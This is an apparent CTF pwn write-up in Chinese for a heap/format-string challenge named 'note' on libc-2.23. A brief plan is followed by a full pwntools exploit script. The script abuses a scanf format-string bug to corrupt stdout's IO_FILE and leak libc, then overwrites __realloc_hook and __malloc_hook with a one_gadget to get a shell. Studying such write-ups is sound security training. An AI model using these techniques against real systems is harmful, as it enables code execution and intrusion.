note

64位，全保護(hù)，使用libc-2.23.so

Tag: scanf字符串格式化洞 IO_File

思路

• 利用say函數(shù)的scanf字符串格式化漏洞對IO_FILE的stdout進(jìn)行寫入，改小flag位置，從而進(jìn)行l(wèi)ibc_leak
• 再次利用此漏洞向malloc_hook寫入one_gadget
• og棧幀條件不滿足，使用realloc微調(diào)

TIPS：任何使用格式化字符串的函數(shù)均存在這一漏洞

EXP

from pwn import *
import sys

name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
sh = 0

l64 = lambda      :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :sh.sendlineafter(str(a),str(b))
sa  = lambda a,b  :sh.sendafter(str(a),str(b))
lg  = lambda name,data : sh.success(name + ": 0x%x" % data)
se  = lambda payload: sh.send(payload)
rl  = lambda      : sh.recv()
sl  = lambda payload: sh.sendline(payload)
ru  = lambda a     :sh.recvuntil(str(a))

def cmd(ch):
    sla("choice: ",ch)

def main(ip,port,debug,mode):
    global sh
    if debug==0:
        context.log_level = "debug"
    else:
        pass
    if mode==0:
        sh = process(name)
    else:
        sh = remote(ip,port)

    cmd(2)
    sa("say ? ","%7$s\x00")
    sh.sendline(p64(0xfbad1800)+p64(0)*3)
    
    libcbase = u64(ru("\x7f")[-6:].ljust(8,"\x00"))-0x3c36e0
    malloc_hook = libcbase+libc.sym["__malloc_hook"]
    realloc_hook = libcbase + libc.sym["__realloc_hook"]
    realloc = libcbase + libc.sym["realloc"]
    og = libcbase + 0x4527a
    lg("libcbase",libcbase)
    lg("malloc_hook",malloc_hook)
    lg("og",og)
    lg("realloc",realloc)
    lg("realloc_hook",realloc_hook)

    cmd(2)
    sh.sendlineafter("say ? ","%7$s"+"\x00"*4+p64(realloc_hook))
    sh.sendlineafter("? ",p64(og)+p64(realloc+6))

    cmd(1)
    sla("size: ",0x10)
    sh.interactive()

if __name__ == '__main__':
    main(0,0,0,0)